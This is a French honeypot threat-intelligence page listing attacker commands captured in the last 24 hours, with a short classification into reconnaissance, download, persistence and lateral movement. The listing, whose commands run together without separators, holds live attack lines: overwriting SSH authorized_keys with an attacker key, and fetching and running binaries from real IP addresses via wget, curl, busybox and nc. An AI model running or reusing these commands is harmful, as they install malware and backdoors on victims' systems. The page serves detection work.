Commandes Executees
Analyse en temps reel des commandes les plus executees par les attaquants apres avoir obtenu l'acces au systeme. Donnees collectees depuis notre reseau mondial de honeypots au cours des dernieres 24 heures.
Top Commandes Executees
lockr -ia .sshcd ~; chattr -ia .ssh; lockr -ia .sshcd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~Enter new UNIX password:uname -alscpu | grep Modelcat /proc/cpuinfo | grep model | grep name | wc -ldf -h | head -n 2 | awk 'FNR == 2 {print $2;}'uname -mtopwhich lsunamels -lh $(which ls)wfree -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'whoamicat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'crontab -lcat /proc/cpuinfo | grep name | wc -lrm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht/bin/./uname -s -v -n -r -mecho hellocd /data/local/tmp/; busybox wget http://176.65.139.11/wget.sh; sh wget.sh; curl http://176.65.139.11/wget.sh -o wget.sh; sh wget.sh; wget http://176.65.139.11/wget.sh; sh wget.shfor dir in /data/local/tmp /tmp /sdcard /mnt/sdcard /storage/emulated/0 /data/cache /dev/shm; do cd $dir && (nc 94.156.152.67 8081 > flexoiu 2>/dev/null || nc -w 30 94.156.152.67 8081 > flexoiu 2>/dev/null) && chmod 777 flexoiu && ./flexoiu & donecd /data/local/tmp && nc 94.156.152.67 8081 > app.apk && pm install -r app.apk && am start -n com.snowrider.game/.SnowRiderActivity && rm app.apkcd /data/local/tmp && nc 94.156.152.67 8081 > flexoiu && chmod 777 flexoiu && ./flexoiucurl2uname -s -v -n -r -mcat /proc/1/mounts && ls /proc/1/; curl2; ps aux; psReconnaissance
Commandes pour collecter des informations systeme (uname, whoami, cat /etc/passwd)
Telechargement
Commandes pour telecharger des malwares (wget, curl, tftp)
Persistance
Commandes pour maintenir l'acces (crontab, chmod, chattr)
Mouvement Lateral
Commandes pour se propager dans le reseau (ssh, scp, ping)
A propos de ces donnees
Ces commandes sont capturees en temps reel lorsque les attaquants obtiennent acces a nos honeypots. Elles representent les techniques reelles utilisees dans les attaques automatisees et manuelles. Utilisez ces informations pour ameliorer votre detection des menaces et votre reponse aux incidents.